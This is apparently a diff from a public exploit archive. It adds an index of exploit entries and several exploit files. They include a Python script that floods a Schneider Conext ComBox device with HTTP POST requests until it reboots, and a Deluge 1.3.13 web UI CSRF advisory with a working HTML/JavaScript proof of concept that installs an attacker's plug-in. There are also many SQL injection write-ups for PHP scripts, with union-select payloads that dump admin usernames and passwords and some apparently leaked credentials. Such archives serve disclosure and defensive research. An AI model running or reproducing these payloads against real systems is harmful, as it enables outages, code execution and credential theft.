 41512,platforms/php/webapps/41512.txt,"Advanced Bus Booking Script 2.04 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41513,platforms/php/webapps/41513.txt,"Entrepreneur Bus Booking Script 3.03 - 'hid_Busid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41514,platforms/php/webapps/41514.txt,"Single Theater Booking Script - 'newsid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41515,platforms/php/webapps/41515.txt,"Responsive Events & Movie Ticket Booking Script - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41516,platforms/php/webapps/41516.txt,"Online Cinema and Event Booking Script 2.01 - 'newsid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41517,platforms/php/webapps/41517.txt,"Redbus Clone Script 3.05 - 'hid_Busid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41518,platforms/php/webapps/41518.txt,"Groupon Clone Script 3.01 - 'catid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41519,platforms/php/webapps/41519.txt,"Naukri Clone Script 3.02 - 'type' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41520,platforms/php/webapps/41520.txt,"Yellow Pages Clone Script 1.3.4 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41521,platforms/php/webapps/41521.txt,"Advanced Matrimonial Script 2.0.3 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41522,platforms/php/webapps/41522.txt,"Advanced Real Estate Script 4.0.6 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41523,platforms/php/webapps/41523.txt,"PHP Classifieds Rental Script 3.6.0 - 'scatid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41524,platforms/php/webapps/41524.txt,"Entrepreneur B2B Script 2.0.4 - 'id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41525,platforms/php/webapps/41525.txt,"PHP Matrimonial Script 3.0 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41526,platforms/php/webapps/41526.txt,"MLM Binary Plan Script 2.0.5 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41527,platforms/php/webapps/41527.txt,"MLM Forced Matrix 2.0.7 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41528,platforms/php/webapps/41528.txt,"MLM Forex Market Plan Script 2.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41529,platforms/php/webapps/41529.txt,"MLM Membership Plan Script 2.0.5 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41530,platforms/php/webapps/41530.txt,"Multireligion Responsive Matrimonial Script 4.7.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41531,platforms/php/webapps/41531.txt,"Network Community Script 3.0.2 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41532,platforms/php/webapps/41532.txt,"PHP B2B Script 3.05 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41533,platforms/php/webapps/41533.txt,"Responsive Matrimonial Script 4.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41534,platforms/php/webapps/41534.txt,"Schools Alert Management Script 2.01 - 'list_id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41535,platforms/php/webapps/41535.txt,"Select Your College Script 2.01 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41536,platforms/php/webapps/41536.txt,"Social Network Script 3.01 - 'id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41539,platforms/php/webapps/41539.txt,"Website Broker Script 3.02 - 'view' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0
 41540,platforms/php/webapps/41540.py,"WordPress Multiple Plugins - Arbitrary File Upload",2017-03-03,"The Martian",php,webapps,0
 41541,platforms/json/webapps/41541.html,"Deluge Web UI 1.3.13 - Cross-Site Request Forgery",2017-03-06,"Kyle Neideck",json,webapps,0
--- a/platforms/hardware/dos/41537.py
+++ b/platforms/hardware/dos/41537.py
@ -0,0 +1,44 @@
 #Exploit Title: Conext ComBox - Denial of Service (HTTP-POST)
 #Description: The exploit cause the device to self-reboot, constituting a denial of service.
 #Google Dork: "Conext ComBox" + "JavaScript was not detected" /OR/ "Conext ComBox" + "Recover Lost Password"
 #Date: March 02, 2017
 #Exploit Author: Mark Liapustin & Arik Kublanov
 #Vendor Homepage: http://solar.schneider-electric.com/product/conext-combox/
 #Software Link: http://cdn.solar.schneider-electric.com/wp-content/uploads/2016/06/conext-combox-data-sheet-20160624.pdf
 #Version: All firmware versions prior to V3.03 BN 830
 #Tested on: Windows and Linux
 #CVE: CVE-2017-6019
 # Use this script with caution!
 # Mark Liapustin: https://www.linkedin.com/in/clizsec/
 # Arik Kublanov: https://www.linkedin.com/in/arik-kublanov-57618a64/
 # =========================================================
 import subprocess
 import os
 import sys
 import time
 import socket
 # =========================================================
 print 'Usage: python ComBoxDos.py IP PORT'
 print 'Number of arguments:', len(sys.argv), 'arguments.'
 print 'Argument List:', str(sys.argv)
 print "ComBox Denial of Service via HTTP-POST Request"
 global cmdosip
 cmdosip = str(sys.argv[1])
 port = int(sys.argv[2])
 print "[!] The script will cause the Conext ComBox device to crash and to reboot itself."
 print "Executing...\n\n\n"
 for i in range(1, 1000):
  try:
 	cmdosdir = "login.cgi?login_username=Nation-E&login_password=DOS&submit=Log+In"
 	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 	s.connect((cmdosip, port))
 	print "[+] Sent HTTP POST Request to: " + cmdosip + " with /" + cmdosdir + " HTTP/1.1"
 	s.send("POST /" + cmdosdir + " HTTP/1.1\r\n")
 	s.send("Host: " + cmdosip + "\r\n\r\n")
 	s.close()
  except: 
     pass
--- a/platforms/json/webapps/41541.html
+++ b/platforms/json/webapps/41541.html
@ -0,0 +1,173 @@
 <!--
 Remote code execution via CSRF vulnerability in the web UI of Deluge 1.3.13
 Kyle Neideck, February 2017
 Product
 -------
 Deluge is a BitTorrent client available from http://deluge-torrent.org.
 Fix
 ---
 Fixed in the (public) source code, but not in binary releases yet. See
 http://git.deluge-torrent.org/deluge/commit/?h=develop&id=11e8957deaf0c76fdfbac62d99c8b6c61cfdddf9
 and
 http://git.deluge-torrent.org/deluge/commit/?h=1.3-stable&id=318ab179865e0707d7945edc3a13a464a108d583
 Install from source or use the web UI from an incognito/private window until
 new binaries are released.
 Summary
 -------
 Deluge version 1.3.13 is vulnerable to cross-site request forgery in the Web UI
 plug-in resulting in remote code execution. Requests made to the /json endpoint
 are not checked for CSRF. See the "render" function of the "JSON" class in
 deluge/ui/web/json_api.py.
 The Web UI plug-in is installed, but not enabled, by default. If the user has
 enabled the Web UI plug-in and logged into it, a malicious web page can use
 forged requests to make Deluge download and install a Deluge plug-in provided
 by the attacker. The plug-in can then execute arbitrary code as the user
 running Deluge (usually the local user account).
 Timeline
 --------
 2017-03-01 Disclosed the vulnerability to Calum Lind (Cas) of Deluge Team
 2017-03-01 Vulnerability fixed by Calum Lind
 2017-03-05 Advisory released
 To Reproduce
 ------------
 - Create/find a Deluge plug-in to be installed on the victim machine. For
   example, create an empty plug-in with
       python deluge/scripts/create_plugin.py --name malicious --basepath . \
           --author-name "n" --author-email "e"
   (see
   http://git.deluge-torrent.org/deluge/tree/deluge/scripts/create_plugin.py?h=1.3-stable&id=318ab179865e0707d7945edc3a13a464a108d583)
   and add a line to its __init__.py to launch calc.exe.
 - Build the plug-in as a .egg (if necessary):
       python malicious/setup.py bdist_egg
 - Make a torrent containing the .egg and seed it somewhere.
 - Create a Magnet link for the torrent.
 - In the proof-of-concept page below, update the PLUGIN_NAME, PLUGIN_FILE and
   MAGNET_LINK constants.
 - Put the PoC on a web server somewhere. Serving it locally is fine.
 - In Deluge, open Preferences, go to the Plugins category and enable the Web
   UI plug-in.
 - Go to the WebUi preferences section and check "Enable web interface". The
   port should be set to 8112 by default.
 - If you're serving the PoC over HTTPS, check "Enable SSL" so its requests
   don't get blocked as mixed content. If you're not, SSL can be enabled or
   disabled.
 - Go to localhost:8112 in a browser on the victim machine and log in.
 - Open the PoC in the same browser.
 The PoC sends requests to localhost:8112 that include cookies. The first
 request adds the torrent, which downloads the .egg (the plug-in) to /tmp. It
 then sends repeated requests to install the .egg and enable it. The attacker's
 code in the plug-in runs when the plug-in is enabled.
 For the attack to be successful, the PoC page must be left open until the
 malicious plug-in finishes downloading. An attacker could avoid that limitation
 by using the Execute plug-in, which is installed by default, but Deluge has to
 be restarted before the Execute plug-in can be used. I don't think that can be
 done from the web UI, so the attacker's code would only execute after the
 victim restarted Deluge and then added/removed/completed a torrent.
 The PoC adds the plug-in torrent using a Magnet link because it would need to
 read the web UI's responses to add a .torrent file, which CORS prevents.
 Proof of Concept
 ----------------
 -->
 <!--
 Deluge 1.3.13 Web UI CSRF
 Tested on Linux, macOS and Windows.
 Kyle Neideck, February 2017
 kyle@bearisdriving.com
 -->
 <html><body><script>
 let PLUGIN_NAME = 'malicious';
 let PLUGIN_FILE = 'malicious-0.1-py2.7.egg';
 let MAGNET_LINK =
    'magnet:?xt=urn:btih:1b02570de69c0cb6d12c544126a32c67c79024b4' +
        '&dn=malicious-0.1-py2.7.egg' +
        '&tr=http%3A%2F%2Ftracker.example.com%3A6969%2Fannounce';
 function send_deluge_json(json) {
    console.log('Sending: ' + json);
    for (let proto of ['http','https']) {
        let xhr = new XMLHttpRequest();
        xhr.open('POST', proto + '://localhost:8112/json');
        xhr.setRequestHeader('Content-Type', 'text/plain');
        xhr.withCredentials = true;
        xhr.onload = function() { console.log(xhr); };
        xhr.send(json);
    }
 }
 let download_location =
    (navigator.appVersion.indexOf("Win") != -1) ?
        'C:\\\\Users\\\\Public' : '/tmp';
 // Download a malicious plugin using a Magnet link.
 //
 // Using the /upload endpoint or adding a .torrent file wouldn't work. We could
 // upload the file (either a .torrent or the plug-in itself), but it would be
 // saved in a temp dir with a random name. CORS would prevent us from reading
 // the path to the file from the response, and to finish the process we'd need
 // to send a second request that includes that path.
 send_deluge_json('{' +
    '"method":"web.add_torrents",' +
    '"params":[[{' +
        '"path":"' + MAGNET_LINK + '",' +
        '"options":{' +
            '"file_priorities":[],' +
            '"add_paused":false,' +
            '"compact_allocation":false,' +
            '"download_location":"' + download_location + '",' +
            '"move_completed":false,' +
            '"move_completed_path":"' + download_location + '",' +
            '"max_connections":-1,' +
            '"max_download_speed":-1,' +
            '"max_upload_slots":-1,' +
            '"max_upload_speed":-1,' +
            '"prioritize_first_last_pieces":false}}]],' +
        '"id":12345}');
 window.stop = false;
 // Repeatedly try to enable the plugin, since we can't tell when it will finish
 // downloading.
 function try_to_add_and_enable_plugin() {
    send_deluge_json('{' +
        '"method":"web.upload_plugin",' +
        '"params":["' + PLUGIN_FILE + '","' +
            download_location + '/' + PLUGIN_FILE + '"],' +
        '"id":12345}');
    send_deluge_json('{' +
        '"method":"core.enable_plugin",' +
        '"params":["' + PLUGIN_NAME + '"],' +
        '"id":12345}');
    if (!window.stop) {
        window.setTimeout(try_to_add_and_enable_plugin, 500);
    }
 }
 try_to_add_and_enable_plugin();
 </script>
 <button onclick="window.stop = true">Stop sending requests</button>
 </body></html>
--- a/platforms/php/webapps/41497.php
+++ b/platforms/php/webapps/41497.php
@ -8,7 +8,7 @@
 header ('Content-type: text/html; charset=UTF-8');
-$url= "https://bucaneiras.org/";
+$url= "http://localhost/";
 $payload="wp-json/wp/v2/users/";
 $urli = file_get_contents($url.$payload);
 $json = json_decode($urli, true);
--- a/platforms/php/webapps/41512.txt
+++ b/platforms/php/webapps/41512.txt
@ -0,0 +1,20 @@
 # # # # # 
 # Exploit Title: Advanced Bus Booking Script v2.04 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/advanced-bus-booking-script/
 # Demo: http://travelbookingscript.com/demo/newbusbooking/
 # Version: 2.04
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
 # http://localhost/[PATH]/seatcheck.php?busid=[SQL]
 # http://localhost/[PATH]/seatcheck.php?seat=[SQL]
 # http://localhost/[PATH]/seatcheck.php?seat=1&busid=1&dat=[SQL]
 # # # # #
--- a/platforms/php/webapps/41513.txt
+++ b/platforms/php/webapps/41513.txt
@ -0,0 +1,18 @@
 # # # # # 
 # Exploit Title: Entrepreneur Bus Booking Script v3.03 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/entrepreneur-bus-booking-script/
 # Demo: http://travelbookingscript.com/demo/busbooking/
 # Version: 3.03
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
 # # # # #
--- a/platforms/php/webapps/41514.txt
+++ b/platforms/php/webapps/41514.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: Single Theater Booking Script - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/single-theater-booking-script/
 # Demo: http://www.theaterbookingscript.com/demo/theater-booking/single-theater/
 # Version: N/A
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/news_desc.php?newsid=[SQL]
 # For example;
 # -7'+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6-- -
 # users :user_id
 # users :email
 # users :user_name
 # users :password
 # users :mobile
 # users :country
 # users :state
 # -7'+/*!13337union*/+select+1,/*!13337concat*/(0x496873616e2053656e63616e203c62723e,user_name,0x3a,password),3,4,5,6+from+users-- -
 # # # # #
--- a/platforms/php/webapps/41515.txt
+++ b/platforms/php/webapps/41515.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: Responsive Events & Movie Ticket Booking Script - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/responsive-events-movie-ticket-booking-script/
 # Demo: http://theaterbookingscript.com/demo/advanced-ticketbooking/
 # Version: N/A
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/news_desc.php?newsid=[SQL]
 # For example;
 # -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6-- -
 # users :user_id
 # users :email
 # users :user_name
 # users :password
 # users :mobile
 # users :country
 # users :state
 # -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,/*!13337Concat*/(user_name,0x3a,password),5,6+from+users-- -
 # # # # #
--- a/platforms/php/webapps/41516.txt
+++ b/platforms/php/webapps/41516.txt
@ -0,0 +1,27 @@
 # # # # # 
 # Exploit Title: Online Cinema and Event Booking Script v2.01 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/online-cinema-and-event-booking-script/
 # Demo: http://theaterbookingscript.com/demo/events-movie/
 # Version: 2.01
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/news_desc.php?newsid=[SQL]
 # For example;
 # -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),5,6-- -
 # users :user_id
 # users :email
 # users :user_name
 # users :password
 # users :mobile
 # users :country
 # users :state
 # -7'+/*!50000union*/+select+1,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,3,/*!13337Concat*/(user_name,0x3a,password),5,6+from+users-- -
 # # # # #
--- a/platforms/php/webapps/41517.txt
+++ b/platforms/php/webapps/41517.txt
@ -0,0 +1,17 @@
 # # # # # 
 # Exploit Title: Redbus Clone Script v3.05 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/redbus-clone/
 # Demo: http://198.38.86.159/~materialmag/demo/redbus-clone-responsive/
 # Version: 3.05
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/available_seat.php?hid_Busid=[SQL]
 # # # # #
--- a/platforms/php/webapps/41518.txt
+++ b/platforms/php/webapps/41518.txt
@ -0,0 +1,25 @@
 # # # # # 
 # Exploit Title: Groupon Clone Script v3.01 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/groupon-clone-script/
 # Demo: http://phpscriptsmall.info/demo/groupon-deal/
 # Version: 3.01
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/product-show.php?catid=[SQL]
 # For example;
 # -40+/*!50000union*/+select+1,2,3,4,5,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -
 # admin :admin_id
 # admin :user
 # admin :pass
 # admin :address
 # admin :mobile
 # -40+/*!50000union*/+select+1,2,3,4,5,/*!50000concat*/(user,0x3a,pass),7,8,9,10,11,12,13,14,15,16,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,18,19,20,21,22+from+admin-- -
 # # # # #
--- a/platforms/php/webapps/41519.txt
+++ b/platforms/php/webapps/41519.txt
@ -0,0 +1,19 @@
 # # # # # 
 # Exploit Title: Naukri Clone Script v3.02 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://phpscriptsmall.com/product/naukri-clone-script/
 # Demo: http://phpscriptsmall.biz/demo/jobsite/
 # Version: 3.02
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/placement.php?type=[SQL]
 # -1'+/*!50000union*/+select+1,@@version,3,4,5,6,7,8-- -
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41520.txt
+++ b/platforms/php/webapps/41520.txt
@ -0,0 +1,22 @@
 # # # # # 
 # Exploit Title: Yellow Pages Clone Script v1.3.4 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/yellow-pages-clone-script/
 # Demo: http://dexteritysolution.com/demo/directory/
 # Version: 1.3.4
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/testmonial.php?blogid=[SQL]
 # -2'+/*!50000union*/+select+1,@@version,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6-- -
 # http://localhost/[PATH]/blog.php?blogid=[SQL]
 # -2'+/*!50000union*/+select+1,@@version,3,4,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,6,7,8,9,10,11,12-- -
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41521.txt
+++ b/platforms/php/webapps/41521.txt
@ -0,0 +1,31 @@
 # # # # # 
 # Exploit Title: Advanced Matrimonial Script v2.0.3 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/advanced-matrimonial/
 # Demo: http://74.124.215.220/~admatrimon/
 # Version: 2.0.3
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/photoalbum.php?userid=[SQL]
 # http://localhost/[PATH]/members_result.php?match_result=[SQL]
 # http://localhost/[PATH]/search_result.php?cityse=Basic+Search&gender=Male&age_from=[SQL]&marital=[SQL]&religion=[SQL]&caste=[SQL]&country=[SQL]&education=[SQL]&Submit=Search
 # For example;
 # photoalbum.php?userid=-22'+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),86,87,88,89-- -
 # status:adminlogin
 # admin_id:adminlogin
 # admin_username:adminlogin
 # admin_password:adminlogin
 # admin_email:adminlogin
 # photoalbum.php?userid=-22'+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,/*!50000concat(*/admin_username,/*!50000char*/(58),admin_password),86,87,88,89+from+adminlogin-- -
 # <input type="hidden" name="userid" value="admin:inetsol" />
 # <input type="hidden" name="userid" value="raj:123456" />
 # <input type="hidden" name="userid" value="sath:123456" />
 # Etc... Etc...
 # # # # #
--- a/platforms/php/webapps/41522.txt
+++ b/platforms/php/webapps/41522.txt
@ -0,0 +1,24 @@
 # # # # # 
 # Exploit Title: Advanced Real Estate Script v4.0.6 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/advanced-real-estate-script/
 # Demo: http://www.phprealestatescript.org/advanced_realestate/
 # Version: 4.0.6
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/state.php?country=[SQL]
 # http://localhost/[PATH]/city.php?city=[SQL]
 # http://localhost/[PATH]/locat.php?locat=[SQL]
 # For example;
 # -1'+/*!50000union*/+select+1,2,3,4,@@version,6-- -
 # -1'+/*!50000union*/+select+1,2,3,4,5,@@version,7,8,9-- -
 # -1'+/*!50000union*/+select+1,2,3,4,5,6,@@version,8-- -
 # Etc... Etc...
 # # # # #
--- a/platforms/php/webapps/41523.txt
+++ b/platforms/php/webapps/41523.txt
@ -0,0 +1,25 @@
 # # # # # 
 # Exploit Title: PHP Classifieds Rental Script v3.6.0 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/php-classifieds-rental-script/
 # Demo: http://198.38.86.159/~classifiedscript/
 # Version: 3.6.0
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/viewsubproducts.php?scatid=[SQL]
 # For example;
 # -2'+/*!50000union*/+select+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64-- -
 # admin:admin_id
 # admin:admin_name
 # admin:username
 # admin:adminpassword
 # -2'+/*!50000union*/+select+1,/*!50000concat*/(username,0x3a,adminpassword),3,4,0x496873616e2053656e63616e207777772e696873616e2e6e6574,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64+from+admin-- -
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41524.txt
+++ b/platforms/php/webapps/41524.txt
@ -0,0 +1,30 @@
 # # # # # 
 # Exploit Title: Entrepreneur B2B Script v2.0.4 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/entrepreneur-b2b-script/
 # Demo: http://www.readymadeb2bscript.com/demo/entre-monicab2b/
 # Version: 2.0.4
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/news-details.php?id=[SQL]
 # For example;
 # -54'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),9,10,11,12,13,14,15--+-
 # admin :id
 # admin :title
 # admin :name
 # admin :last_name
 # admin :company
 # admin :sex
 # admin :username
 # admin :password
 # admin :ref_password
 # -54'+/*!50000union*/+select+1,2,0x496873616e2053656e63616e203c62723e7777772e696873616e2e6e6574,4,5,6,7,/*!50000concat*/(username,0x3a,password),9,10,11,12,13,14,15+from+admin--+-
 # Etc...
 # # # # #
--- a/platforms/php/webapps/41525.txt
+++ b/platforms/php/webapps/41525.txt
@ -0,0 +1,26 @@
 # # # # # 
 # Exploit Title: Matrimonial Script v3.0 - SQL Injection
 # Google Dork: N/A
 # Date: 06.03.2017
 # Vendor Homepage: http://www.phpscriptsmall.com/
 # Software : http://www.phpscriptsmall.com/product/matrimonial-script/
 # Demo: http://74.124.215.220/~matriialscrip/
 # Version: 3.0
 # Tested on: Win7 x64, Kali Linux x64
 # # # # # 
 # Exploit Author: Ihsan Sencan
 # Author Web: http://ihsan.net
 # Author Mail : ihsan[@]ihsan[.]net
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/mother_tongue_search.php?/IhsanSencan&id=[SQL]
 # http://localhost/[PATH]/mother_tongue_search.php?/index_search_result.php?smart_search_gender=[SQL]Male&in_age_from=[SQL]18&in_age_to=[SQL]45&in_religion=[SQL]&in_mother=[SQL]&in_caste=[SQL]&in_country=[SQL]
 # For example;
 # -8'+/*!50000union*/+select+1,2,3,0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54--+-
 # adminlogin :id
 # adminlogin :userid
 # adminlogin :password
 # adminlogin :email
